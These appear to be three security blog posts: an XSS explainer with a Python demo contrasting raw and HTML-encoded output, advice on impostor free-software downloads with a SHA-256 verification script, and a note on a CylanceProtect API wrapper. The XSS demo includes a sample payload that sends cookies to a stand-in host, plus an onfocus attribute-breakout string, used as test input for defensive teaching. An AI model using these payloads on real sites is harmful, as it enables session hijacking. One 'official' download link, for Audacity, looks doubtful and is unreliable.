Cross Site Scripting Attacks On Your Company Website and How to Protect Against Them

Your business’ website, and the domain (.com, .ca, .net, etc.) that goes with it, are an important part of your organisation’s identity and are increasingly the first place consumers go to find out who you are and what you do. The last thing you want, especially during an already strained moment in the world’s economy, is for a potential client to be served an ad or redirected to another website when visiting yours.

Cross-site Scripting Vulnerability
There are many ways for an attacker to take advantage of you through your website, including a technique called Cross-Site Scripting, or XSS for short. An XSS vulnerability allows an attacker to inject a piece of script into a page on your website. That script then runs in the browser of every visitor who loads the page, where it can show ads, redirect to another site, drop malware, or read the visitor’s session cookies and form data. In effect, the attacker is using your website as a medium to deliver malicious content to unsuspecting visitors.

An XSS vulnerability exists when data your website accepts is written back into a page without being properly validated and, above all, encoded for the context it is output in. Sources include contact forms, shopping carts, login forms, search boxes, URL parameters and HTTP headers. Essentially, any point where data enters your website can be the starting point of an XSS attack, whether the data is stored and shown to later visitors (stored XSS) or echoed straight back in the response (reflected XSS).

Protecting Against XSS Vulnerabilities
The most effective protection against XSS is context-aware output encoding: every piece of user-supplied data is encoded for the place it is written into (HTML body, attribute value, JavaScript, URL) at the moment it is output, so that a browser treats it as text rather than markup. HTML encoding, which turns characters such as <, >, &, " and ' into entities like &lt; and &amp;, is the most common form of this. Rejecting all special characters at the input instead is a blunt tool: it breaks legitimate input (names like O’Brien, company names like AT&T) and does nothing for data that reaches the page by another route, so treat input validation as a second layer rather than the main defence. XSS vulnerabilities can be identified during development with both Static (SAST) and Dynamic Application Security Testing (DAST), and should be remediated before code is pushed to production.
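To show the difference between raw interpolation and output encoding, here is an added Python example (not code from the original post): a contact form echoes a field into the HTML body and into an input’s value attribute, once unencoded and once through html.escape, and a small HTMLParser-based inspector reports what a browser’s tokenizer would see. The templates, the two payloads and the visitor name are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs for the demonstration (not taken from the post).
BENIGN_NAME = "O'Brien & Sons"
SCRIPT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(1)'

# Two output contexts a contact form might echo a field back into.
BODY_TEMPLATE = "<p>Thanks for your message, {value}!</p>"
ATTRIBUTE_TEMPLATE = '<input type="text" name="name" value="{value}">'


def render_vulnerable(template: str, value: str) -> str:
    """Raw interpolation: whatever the visitor typed becomes part of the
    page's markup and runs in every other visitor's browser."""
    return template.format(value=value)


def render_encoded(template: str, value: str) -> str:
    """Same template, but the value is HTML-encoded first.  quote=True also
    encodes the quote characters, which is what keeps the attribute context
    safe; without it ATTRIBUTE_PAYLOAD would still break out of value="..."."""
    return template.format(value=html.escape(value, quote=True))


class _MarkupInspector(HTMLParser):
    """Tokenises rendered HTML the way a browser would, recording script
    elements, on* event-handler attributes and the visible text."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")

    def handle_data(self, data):
        self.text.append(data)


def active_content(rendered: str) -> list:
    """Script elements and event handlers a browser would execute."""
    inspector = _MarkupInspector()
    inspector.feed(rendered)
    inspector.close()
    return inspector.findings


def visible_text(rendered: str) -> str:
    """Text the visitor actually sees, with entities decoded as a browser does."""
    inspector = _MarkupInspector()
    inspector.feed(rendered)
    inspector.close()
    return "".join(inspector.text)


if __name__ == "__main__":
    for template, payload in ((BODY_TEMPLATE, SCRIPT_PAYLOAD),
                              (ATTRIBUTE_TEMPLATE, ATTRIBUTE_PAYLOAD)):
        print("vulnerable:", active_content(render_vulnerable(template, payload)))
        print("encoded:   ", active_content(render_encoded(template, payload)))
    # Encoding does not mangle legitimate input: the visitor still sees the
    # apostrophe and ampersand that a blocklist of "special characters" would reject.
    print(visible_text(render_encoded(BODY_TEMPLATE, BENIGN_NAME)))
```

Note the attribute case: escaping only <, > and & would not stop ATTRIBUTE_PAYLOAD, because it breaks out of the quoted value with a double quote; the encoding has to match the output context. Because encoding happens at output rather than at the form, the benign name keeps its apostrophe and ampersand instead of being rejected.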

Many websites, including this one, rely on a Content Management System (CMS) to manage and display content; WordPress and Drupal are two examples. When using a CMS you will rely on plug-ins for functionality such as contact forms, and while you can’t know with certainty what security controls were used in developing a plug-in, you can keep it updated with the latest patches. Your CMS lets you update plug-ins from its administration dashboard. WordPress 3.7 introduced automatic background updates, but by default they apply only to minor core releases; automatic plug-in updates have to be turned on separately (through the auto_update_plugin filter, or the per-plug-in toggle in newer versions), and plug-ins you no longer use should be removed rather than left installed.

Resources
OWASP – Cross Site Scripting (XSS)

How Hackers Use Free Software To Spread Malware

Bad Microsoft Store Downloads

In a world where the Covid-19 virus is dominating and forcing businesses to shutter or employees to work from home, technology companies are stepping up in a big way to offer many of their services and products at reduced or no cost. This has made the forced transition to a primarily remote workforce easier in many regards, but it also adds an element of risk that some companies aren’t necessarily thinking about these days, and I can’t blame them.

To understand the risk that software introduces, it’s important to understand the many ways a bad actor can take advantage of companies offering free software to spread malware and possibly steal your data. This type of risk is usually called third-party risk, because you don’t have the same control over the software as over something you developed in house.

Understanding the Software Supply-Chain

If you look at any piece of enterprise software in 2020 it will almost certainly be built on frameworks like .NET, Node.js, and Ruby on Rails, plus the many smaller libraries those frameworks pull in. These frameworks can save thousands of hours of development time by providing libraries of predefined code. In using them you are almost certainly NOT reviewing that code yourself; you are relying on the developers of these libraries to keep vulnerabilities out of it, and on yourself to pick up their security releases when they ship.

A real-world example of a supply-chain attack is the 2013 Target breach. The attackers first compromised Target’s HVAC vendor and stole the credentials the vendor used to connect to Target’s network; those credentials got them inside. Once inside the network they only needed to find a way to move laterally to more important computers holding more important information.

Free Software Makes Supply-Chain Attacks Easier

I love free software as much as the next guy; just make sure that you’re getting it from an appropriate source. A quick search on the Microsoft Store itself brought up a number of free programs that were being peddled for cash (seen in the picture above). These are NOT official releases of this software, but they are certainly easier for any Windows user to find than the official ones. Here are the actual, safe links, for your information.

https://www.qbittorrent.org/
http://www.darkaudacity.com/
https://www.smplayer.info/
https://pwsafe.org/

There is simply no guarantee that these publishers didn’t modify the software in some way to track you or steal data. In many cases these publishers bundle adware to make a quick buck.

Protecting Yourself

  • Track any third-party code or vendor relationships so that security releases are applied promptly. This might be as simple as an Excel spreadsheet or as complex as an entire third-party risk management department.
  • Always download software from official sources. A quick Google search of the software will often bring up the appropriate website as the first result, but be wary of sponsored results, which are a common way of pushing impostor downloads.
  • Reduce the human factor by providing employees with security awareness training on a regular basis.
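A practical check to go with the last two points, as an added Python example rather than anything from the original post or from the projects linked above: compute the SHA-256 of what you downloaded and compare it with the digest the project publishes on its own site, in the "digest  filename" format that sha256sum produces. The installer bytes and the SHA256SUMS text below are constructed stand-ins, not real releases or real vendor data.

```python
import hashlib
import hmac

# Constructed stand-ins for a download and the vendor's published digest list
# (not real installers or real vendor data).
GENUINE_INSTALLER = b"abc"
TAMPERED_INSTALLER = b"abc" + b"\x00bundled-adware"
PUBLISHED_SHA256SUMS = """\
# SHA256SUMS as a project might publish them on its own site
BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD  installer-1.0.exe
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 *empty-file.bin
"""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_sha256sums(text: str) -> dict:
    """Parse 'digest  filename' lines (the format sha256sum(1) emits; a
    leading '*' on the filename marks binary mode).  Comments and blank
    lines are skipped; a digest that is not 64 hex characters is rejected."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, filename = line.partition(" ")
        filename = filename.strip().lstrip("*")
        digest = digest.lower()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"malformed digest for {filename!r}")
        sums[filename] = digest
    return sums


def verify_download(data: bytes, published_sha256: str) -> bool:
    """True only if the bytes we received hash to the digest the vendor
    published.  compare_digest keeps the comparison constant-time."""
    return hmac.compare_digest(sha256_hex(data), published_sha256.strip().lower())


def verify_file(path: str, published_sha256: str) -> bool:
    """Same check for a real file on disk, read in chunks so a large
    installer does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return hmac.compare_digest(h.hexdigest(), published_sha256.strip().lower())


if __name__ == "__main__":
    sums = parse_sha256sums(PUBLISHED_SHA256SUMS)
    expected = sums["installer-1.0.exe"]
    print("genuine :", verify_download(GENUINE_INSTALLER, expected))   # True
    print("tampered:", verify_download(TAMPERED_INSTALLER, expected))  # False
```

The digest list must come from the official site over HTTPS, not from the same third-party page that served the download; an impostor can publish matching hashes for its own build. Where a project signs its releases (GPG signatures or Windows Authenticode), verify the signature as well, since that ties the file to the publisher’s key rather than to a web page.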

CylanceProtect API Wrapper in Python3

Open Source

CylanceProtect is an artificial intelligence based anti-virus solution that is now owned by Blackberry.

A few years ago I wrote a Python3 wrapper for the CylanceProtect API. It’s not well tested, but fairly well documented. Feel free to check it out on Github and modify it as you see fit.

CyPyAPI was designed as an object-oriented class, so you simply instantiate the object with the required connection settings and then call whatever methods you wish.

import cypyapi

# Cylance API credentials from the Cylance console; replace the
# placeholders with your own values.
tenant_id = "<tenant-id>"
app_id = "<application-id>"
app_secret = "<application-secret>"

# Create a new CyPyAPI object with the connection settings
# (assumes the class is exported as cypyapi.CyPyAPI).
cypyapi_object = cypyapi.CyPyAPI(tenant_id, app_id, app_secret)

# Now call whatever method you wish.
users = cypyapi_object.get_users()

It’s as simple as that.

Check out the code over on GitHub.